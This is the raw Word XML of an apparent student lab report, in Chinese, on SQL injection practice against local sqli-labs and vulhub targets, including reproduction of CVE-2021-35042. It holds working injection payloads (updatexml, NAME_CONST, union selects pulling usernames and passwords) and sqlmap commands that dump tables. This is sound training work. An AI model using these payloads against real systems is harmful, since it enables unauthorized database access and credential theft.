            <wp:docPr id="233227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77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44F7" w14:textId="45508C87" w:rsidR="00BB263D" w:rsidRDefault="00BB263D" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个字符r</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367A2323" w14:textId="72B7120D" w:rsidR="00BB263D" w:rsidRPr="002C6A50" w:rsidRDefault="00BB263D" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长度：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD77AE7" w14:textId="39658CDA" w:rsidR="002C6A50" w:rsidRDefault="00BB263D" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07D94E4E" wp14:editId="5201E69E">
            <wp:extent cx="5274310" cy="3506470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2007304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043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28FE" w14:textId="7136B36F" w:rsidR="00BB263D" w:rsidRDefault="00BB263D" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长度为8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EAC54F" w14:textId="6EED1A00" w:rsidR="00BB263D" w:rsidRDefault="00BB263D" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个个找，发现表名：referers</w:t>
      </w:r>
      <w:r w:rsidR="00741CEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，u</w:t>
      </w:r>
      <w:r w:rsidR="00741CEA">
        <w:t>sers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EF8939" w14:textId="5482E981" w:rsidR="00741CEA" w:rsidRDefault="00741CEA" w:rsidP="00C45C0D">
      <w:r>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表里有user</w:t>
      </w:r>
      <w:r>
        <w:t>name,password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16465D60" w14:textId="235C56BE" w:rsidR="00741CEA" w:rsidRDefault="00741CEA" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="287882B4" wp14:editId="708E9DFB">
            <wp:extent cx="5274310" cy="3387725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1087936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366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E92F" w14:textId="5788F188" w:rsidR="00741CEA" w:rsidRDefault="00741CEA" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BA6E279" wp14:editId="3B5CA411">
            <wp:extent cx="5274310" cy="3509645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1645927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279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B01D" w14:textId="18DF3497" w:rsidR="00432CCF" w:rsidRDefault="00432CCF" w:rsidP="00C45C0D">
      <w:r w:rsidRPr="00432CCF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45F1369C" wp14:editId="1856298C">
            <wp:extent cx="5274310" cy="2846705"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="21434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29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CC31" w14:textId="3C14D021" w:rsidR="00432CCF" w:rsidRDefault="00432CCF" w:rsidP="00C45C0D">
      <w:r>
        <w:t>Username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一行为Dumb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE93F6" w14:textId="77777777" w:rsidR="00860BFE" w:rsidRDefault="00860BFE" w:rsidP="00C45C0D"/>
    <w:p w14:paraId="5F46A4AD" w14:textId="7F58232A" w:rsidR="00860BFE" w:rsidRDefault="00860BFE" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错注入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7B0CF5" w14:textId="7BF00B74" w:rsidR="00860BFE" w:rsidRDefault="00A74BCB" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42F45D99" wp14:editId="02EBCE67">
            <wp:extent cx="5274310" cy="3591560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="606675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53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A07C" w14:textId="28F50488" w:rsidR="00A74BCB" w:rsidRDefault="00A74BCB" w:rsidP="00C45C0D">
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ouble超过范围：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD1C5FB" w14:textId="05D1B08F" w:rsidR="00A74BCB" w:rsidRDefault="00A74BCB" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="586F1911" wp14:editId="5EB21E99">
            <wp:extent cx="5274310" cy="3349625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="47488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857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331D" w14:textId="15662979" w:rsidR="00A74BCB" w:rsidRDefault="00BC25BE" w:rsidP="00C45C0D">
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>igint溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D079C5A" w14:textId="37045653" w:rsidR="00BC25BE" w:rsidRDefault="00BC25BE" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C707A94" wp14:editId="0F9B6896">
            <wp:extent cx="5274310" cy="3145790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1781033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333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C2C5" w14:textId="45BF79CC" w:rsidR="00BC25BE" w:rsidRDefault="00BC25BE" w:rsidP="00C45C0D">
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>path报错注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5244DECB" w14:textId="7E84DCC6" w:rsidR="00BC25BE" w:rsidRDefault="00BC25BE" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A16A000" wp14:editId="09EB8237">
            <wp:extent cx="5274310" cy="3654425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1441082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29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D33E" w14:textId="77777777" w:rsidR="006117BB" w:rsidRDefault="006117BB" w:rsidP="006117BB">
      <w:r>
        <w:t>http://127.0.0.1/sqli-labs-master/Less-5/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C56CD1" w14:textId="1F75A7D9" w:rsidR="006117BB" w:rsidRDefault="006117BB" w:rsidP="006117BB">
      <w:r>
        <w:t>?id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DE681B" w14:textId="0FF97D0B" w:rsidR="00BC25BE" w:rsidRDefault="006117BB" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="713EC1CB" wp14:editId="541BD0DC">
            <wp:extent cx="5274310" cy="3462655"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="170976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639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FB98" w14:textId="77777777" w:rsidR="00146362" w:rsidRDefault="00146362" w:rsidP="00146362">
      <w:r>
        <w:t>http://127.0.0.1/sqli-labs-master/Less-5/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D77D1B8" w14:textId="78CBC63D" w:rsidR="006117BB" w:rsidRPr="002C6A50" w:rsidRDefault="00146362" w:rsidP="00146362">
      <w:r>
        <w:t>?id=1' union select 1,2,3 from (select NAME CONST(version(),1),NAME CONST(version(),1))x--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13920D01" w14:textId="77777777" w:rsidR="00C45C0D" w:rsidRDefault="00C45C0D" w:rsidP="00C45C0D">
      <w:r>
        <w:t>2、实战靶场vulhub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650992D6" w14:textId="77777777" w:rsidR="00C45C0D" w:rsidRDefault="00C45C0D" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1）准备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5313C7" w14:textId="77777777" w:rsidR="00C45C0D" w:rsidRDefault="00C45C0D" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考实验指导</w:t>
      </w:r>
      <w:r>
        <w:t>2，使用docker搭建vulhub靶场。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2A92AE" w14:textId="77777777" w:rsidR="00C45C0D" w:rsidRDefault="00C45C0D" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>2）实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C42744" w14:textId="6599B139" w:rsidR="007F4B05" w:rsidRDefault="00C45C0D" w:rsidP="007F4B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复现</w:t>
      </w:r>
      <w:r>
        <w:t>CVE-2021-35042（Django SQL注入漏洞），使用sqlmap工具注出数据库库名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9ECC0D" w14:textId="4B6BFAC4" w:rsidR="00146362" w:rsidRDefault="00F44FE9" w:rsidP="007F4B05">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08801D2E" wp14:editId="3B599C89">
            <wp:extent cx="5274310" cy="5405755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="293377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771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B2E6" w14:textId="2F9D404C" w:rsidR="00F44FE9" w:rsidRDefault="00F44FE9" w:rsidP="007F4B05">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EB880E5" wp14:editId="667E2855">
            <wp:extent cx="5274310" cy="3578860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="704842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425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83C" w14:textId="6CF9F2B8" w:rsidR="00F44FE9" w:rsidRDefault="00F44FE9" w:rsidP="007F4B05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BE18091" wp14:editId="1EE57E6E">
            <wp:extent cx="5274310" cy="1795780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="564909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092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6894" w14:textId="3C1769F7" w:rsidR="00F44FE9" w:rsidRDefault="009D6453" w:rsidP="007F4B05">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6948FD79" wp14:editId="5E592193">
            <wp:extent cx="5274310" cy="3035300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1923482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829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E9" w14:textId="67F10EF6" w:rsidR="009D6453" w:rsidRDefault="001F3E6C" w:rsidP="007F4B05">
      <w:r w:rsidRPr="001F3E6C">
        <w:t xml:space="preserve">sqlmap -u "http://127.0.0.1:8000/vuln/?order=vuln_collection.name" --technique=E -D cve </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3E6C">
        <w:t>tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE7EFCE" w14:textId="7D1DF627" w:rsidR="001F3E6C" w:rsidRDefault="001F3E6C" w:rsidP="007F4B05">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01792451" wp14:editId="357EA061">
            <wp:extent cx="5274310" cy="2867660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="70981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145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64E3" w14:textId="01DE827E" w:rsidR="001F3E6C" w:rsidRDefault="001F3E6C" w:rsidP="007F4B05">
      <w:r w:rsidRPr="001F3E6C">
        <w:t xml:space="preserve">sqlmap -u "http://127.0.0.1:8000/vuln/?order=vuln_collection.name" --technique=E -D cve -T vuln_collection </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3E6C">
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71780A6E" w14:textId="548A27FB" w:rsidR="001F3E6C" w:rsidRDefault="001F3E6C" w:rsidP="007F4B05">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="532CAB17" wp14:editId="370EDE3A">
            <wp:extent cx="5274310" cy="2867660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1262523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235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48E" w14:textId="77777777" w:rsidR="001F3E6C" w:rsidRPr="001F3E6C" w:rsidRDefault="001F3E6C" w:rsidP="007F4B05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="622C28CC" w14:textId="77777777" w:rsidR="001F3E6C" w:rsidRPr="001F3E6C" w:rsidRDefault="001F3E6C" w:rsidP="007F4B05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B235B4E" w14:textId="77777777" w:rsidR="007F4B05" w:rsidRPr="005474D4" w:rsidRDefault="007F4B05" w:rsidP="007F4B05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005474D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>实验总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA1DE72" w14:textId="7EC23ACB" w:rsidR="00E73849" w:rsidRPr="00E73849" w:rsidRDefault="001F3E6C" w:rsidP="001F3E6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了解并尝试了web方向的环境搭建和漏洞复现，初步接触了sql</w:t>
      </w:r>
      <w:r>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E73849" w:rsidRPr="00E738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6FC65" w14:textId="77777777" w:rsidR="006D2616" w:rsidRDefault="006D2616" w:rsidP="00525D55">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="13A66C86" w14:textId="77777777" w:rsidR="006D2616" w:rsidRDefault="006D2616" w:rsidP="00525D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5D591" w14:textId="77777777" w:rsidR="006D2616" w:rsidRDefault="006D2616" w:rsidP="00525D55">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6D157764" w14:textId="77777777" w:rsidR="006D2616" w:rsidRDefault="006D2616" w:rsidP="00525D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6BB1F1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="536BB1F1"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="781E6FF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C73CDC1E"/>
    <w:lvl w:ilvl="0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num w:numId="1" w16cid:durableId="327559858">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="6655961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071"/>
    <w:rsid w:val="00004FC3"/>
    <w:rsid w:val="00042D07"/>
    <w:rsid w:val="00043A56"/>
    <w:rsid w:val="00055D18"/>
    <w:rsid w:val="000579A3"/>
    <w:rsid w:val="000601B6"/>
    <w:rsid w:val="00067B21"/>
    <w:rsid w:val="00075D36"/>
    <w:rsid w:val="000906E2"/>
    <w:rsid w:val="000E61A8"/>
    <w:rsid w:val="000F68D0"/>
    <w:rsid w:val="000F76F6"/>
    <w:rsid w:val="00137488"/>
    <w:rsid w:val="00140EBB"/>
    <w:rsid w:val="00146362"/>
    <w:rsid w:val="001527CD"/>
    <w:rsid w:val="0015708F"/>
    <w:rsid w:val="001630EB"/>
    <w:rsid w:val="00167EE8"/>
    <w:rsid w:val="0018481E"/>
    <w:rsid w:val="001D459F"/>
    <w:rsid w:val="001E777B"/>
    <w:rsid w:val="001F3E6C"/>
    <w:rsid w:val="0020212D"/>
    <w:rsid w:val="002047E0"/>
    <w:rsid w:val="0022664A"/>
    <w:rsid w:val="00257B79"/>
    <w:rsid w:val="0029241F"/>
    <w:rsid w:val="002951DC"/>
    <w:rsid w:val="002A0444"/>
    <w:rsid w:val="002B77D9"/>
    <w:rsid w:val="002C59D2"/>
    <w:rsid w:val="002C6A50"/>
    <w:rsid w:val="002D6DBA"/>
    <w:rsid w:val="002E2CCE"/>
    <w:rsid w:val="00326637"/>
    <w:rsid w:val="00327398"/>
    <w:rsid w:val="00341589"/>
    <w:rsid w:val="0034303E"/>
    <w:rsid w:val="00346DF8"/>
    <w:rsid w:val="00354F79"/>
    <w:rsid w:val="003706E0"/>
    <w:rsid w:val="00372530"/>
    <w:rsid w:val="00381CF4"/>
    <w:rsid w:val="0038332C"/>
    <w:rsid w:val="0039377D"/>
    <w:rsid w:val="00396190"/>
    <w:rsid w:val="003B2A46"/>
    <w:rsid w:val="003B6078"/>
    <w:rsid w:val="003B6697"/>
    <w:rsid w:val="003C0465"/>
    <w:rsid w:val="003D3CF5"/>
    <w:rsid w:val="003F7880"/>
    <w:rsid w:val="00425CEC"/>
    <w:rsid w:val="004311E9"/>
    <w:rsid w:val="00432CCF"/>
    <w:rsid w:val="0043544C"/>
    <w:rsid w:val="00460473"/>
    <w:rsid w:val="00460C79"/>
    <w:rsid w:val="00466E19"/>
    <w:rsid w:val="00486426"/>
    <w:rsid w:val="004954DC"/>
    <w:rsid w:val="00496F35"/>
    <w:rsid w:val="004A136A"/>
    <w:rsid w:val="004B117D"/>
    <w:rsid w:val="004B42CB"/>
    <w:rsid w:val="004C25AE"/>
    <w:rsid w:val="004D6D7A"/>
    <w:rsid w:val="004E4BA6"/>
    <w:rsid w:val="004E546D"/>
    <w:rsid w:val="004E66FD"/>
    <w:rsid w:val="00511B4C"/>
    <w:rsid w:val="005121B8"/>
    <w:rsid w:val="00513E67"/>
    <w:rsid w:val="0051566D"/>
    <w:rsid w:val="00525D55"/>
    <w:rsid w:val="005417B6"/>
    <w:rsid w:val="005655B5"/>
    <w:rsid w:val="005665FD"/>
    <w:rsid w:val="005673B2"/>
    <w:rsid w:val="00570306"/>
    <w:rsid w:val="005831E6"/>
    <w:rsid w:val="00585E3B"/>
    <w:rsid w:val="0059222A"/>
    <w:rsid w:val="005951C2"/>
    <w:rsid w:val="005A2B08"/>
    <w:rsid w:val="005A6CCE"/>
    <w:rsid w:val="005B535F"/>
    <w:rsid w:val="005C5AE6"/>
    <w:rsid w:val="005E6F12"/>
    <w:rsid w:val="00610A3D"/>
    <w:rsid w:val="006117BB"/>
    <w:rsid w:val="006121B5"/>
    <w:rsid w:val="00612DFD"/>
    <w:rsid w:val="00627DB4"/>
    <w:rsid w:val="006A7609"/>
    <w:rsid w:val="006B2D69"/>
    <w:rsid w:val="006C3E77"/>
    <w:rsid w:val="006D2616"/>
    <w:rsid w:val="006D67F1"/>
    <w:rsid w:val="006D76B0"/>
    <w:rsid w:val="0070088A"/>
    <w:rsid w:val="00707320"/>
    <w:rsid w:val="00713F5B"/>
    <w:rsid w:val="00737CD7"/>
    <w:rsid w:val="00741CEA"/>
    <w:rsid w:val="007526C7"/>
    <w:rsid w:val="00761313"/>
    <w:rsid w:val="00761618"/>
    <w:rsid w:val="00777172"/>
    <w:rsid w:val="00777AC2"/>
    <w:rsid w:val="00782D42"/>
    <w:rsid w:val="007A01BD"/>
    <w:rsid w:val="007C1FD5"/>
    <w:rsid w:val="007D0D54"/>
    <w:rsid w:val="007D3D5D"/>
    <w:rsid w:val="007F026C"/>
    <w:rsid w:val="007F4B05"/>
    <w:rsid w:val="008061D4"/>
    <w:rsid w:val="008340EF"/>
    <w:rsid w:val="00835E89"/>
    <w:rsid w:val="00860BFE"/>
    <w:rsid w:val="008755D5"/>
    <w:rsid w:val="00876D88"/>
    <w:rsid w:val="008863C7"/>
    <w:rsid w:val="0088689B"/>
    <w:rsid w:val="00893A39"/>
    <w:rsid w:val="008A1B77"/>
    <w:rsid w:val="008A22C8"/>
    <w:rsid w:val="008B51EB"/>
    <w:rsid w:val="008C44B4"/>
    <w:rsid w:val="008D2936"/>
    <w:rsid w:val="008E15D2"/>
    <w:rsid w:val="009041A2"/>
    <w:rsid w:val="009056EF"/>
    <w:rsid w:val="00926151"/>
    <w:rsid w:val="00936763"/>
    <w:rsid w:val="00947C95"/>
    <w:rsid w:val="00964C49"/>
    <w:rsid w:val="00965B73"/>
    <w:rsid w:val="00993407"/>
    <w:rsid w:val="009A65E5"/>
    <w:rsid w:val="009B65D4"/>
    <w:rsid w:val="009D6453"/>
    <w:rsid w:val="00A0505E"/>
    <w:rsid w:val="00A075A0"/>
    <w:rsid w:val="00A152E1"/>
    <w:rsid w:val="00A27AA7"/>
    <w:rsid w:val="00A5291F"/>
    <w:rsid w:val="00A6241C"/>
    <w:rsid w:val="00A66B7B"/>
    <w:rsid w:val="00A74BCB"/>
    <w:rsid w:val="00A8569A"/>
    <w:rsid w:val="00AA239C"/>
    <w:rsid w:val="00AA78A0"/>
    <w:rsid w:val="00AC5218"/>
    <w:rsid w:val="00AD71F3"/>
    <w:rsid w:val="00AE756F"/>
    <w:rsid w:val="00B24099"/>
    <w:rsid w:val="00B34D61"/>
    <w:rsid w:val="00B35B70"/>
    <w:rsid w:val="00B3774E"/>
    <w:rsid w:val="00B37D02"/>
    <w:rsid w:val="00B505CF"/>
    <w:rsid w:val="00B931DD"/>
    <w:rsid w:val="00BB263D"/>
    <w:rsid w:val="00BC25BE"/>
    <w:rsid w:val="00BC4AB8"/>
    <w:rsid w:val="00BD06E9"/>
    <w:rsid w:val="00BE1D99"/>
    <w:rsid w:val="00C03464"/>
    <w:rsid w:val="00C076A7"/>
    <w:rsid w:val="00C14E23"/>
    <w:rsid w:val="00C239E8"/>
    <w:rsid w:val="00C44FC7"/>
    <w:rsid w:val="00C45C0D"/>
    <w:rsid w:val="00C56ECE"/>
    <w:rsid w:val="00C62071"/>
    <w:rsid w:val="00C711F7"/>
    <w:rsid w:val="00C71937"/>
    <w:rsid w:val="00CC388E"/>
    <w:rsid w:val="00CC6D99"/>
    <w:rsid w:val="00D02EDE"/>
    <w:rsid w:val="00D14C14"/>
    <w:rsid w:val="00D16BDE"/>
    <w:rsid w:val="00D31DAB"/>
    <w:rsid w:val="00D40E96"/>
    <w:rsid w:val="00D4215A"/>
    <w:rsid w:val="00D554EE"/>
    <w:rsid w:val="00D627D6"/>
    <w:rsid w:val="00D64CDF"/>
    <w:rsid w:val="00D723BF"/>
    <w:rsid w:val="00DA108A"/>
    <w:rsid w:val="00DA11D4"/>
    <w:rsid w:val="00DC1A02"/>
    <w:rsid w:val="00DE0631"/>
    <w:rsid w:val="00DE0BF1"/>
    <w:rsid w:val="00DF41CA"/>
    <w:rsid w:val="00E145E8"/>
    <w:rsid w:val="00E24155"/>
    <w:rsid w:val="00E35FF4"/>
    <w:rsid w:val="00E41FD2"/>
    <w:rsid w:val="00E57AFB"/>
    <w:rsid w:val="00E73849"/>
    <w:rsid w:val="00E76E22"/>
    <w:rsid w:val="00E910B7"/>
    <w:rsid w:val="00EB17B3"/>
    <w:rsid w:val="00EB55A1"/>
    <w:rsid w:val="00EC5687"/>
    <w:rsid w:val="00EC5723"/>
    <w:rsid w:val="00ED7DF6"/>
    <w:rsid w:val="00EE23A5"/>
    <w:rsid w:val="00EE7304"/>
    <w:rsid w:val="00F14F1D"/>
    <w:rsid w:val="00F2292D"/>
    <w:rsid w:val="00F254A1"/>
    <w:rsid w:val="00F44FE9"/>
    <w:rsid w:val="00F9114A"/>
    <w:rsid w:val="00F93E8A"/>
    <w:rsid w:val="00FA10C0"/>
    <w:rsid w:val="00FC0A8A"/>
    <w:rsid w:val="00FD7A12"/>
    <w:rsid w:val="00FE66FA"/>
    <w:rsid w:val="00FE7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E44A79"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{82C453AB-A601-4438-87E5-B30B535FD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0306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A01B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E35FF4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B931D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7A01BD"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="3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525D5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25D5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25D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25D55"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004311E9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4311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43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/sqli-labs-master/Less-1/?id=-1%27union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata--" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27union%20select%201,username,password%20from%20users%20where%20id=2--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127.0.0.1/sqli-labs-master/Less-1/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--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2719</TotalTime>
  <Pages>23</Pages>
  <Words>477</Words>
  <Characters>2719</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>22</Lines>
  <Paragraphs>6</Paragraphs>
  <ScaleCrop>false</ScaleCrop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 子曦</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>竹 修玄</cp:lastModifiedBy>
  <cp:revision>200</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-08T08:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-19T08:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>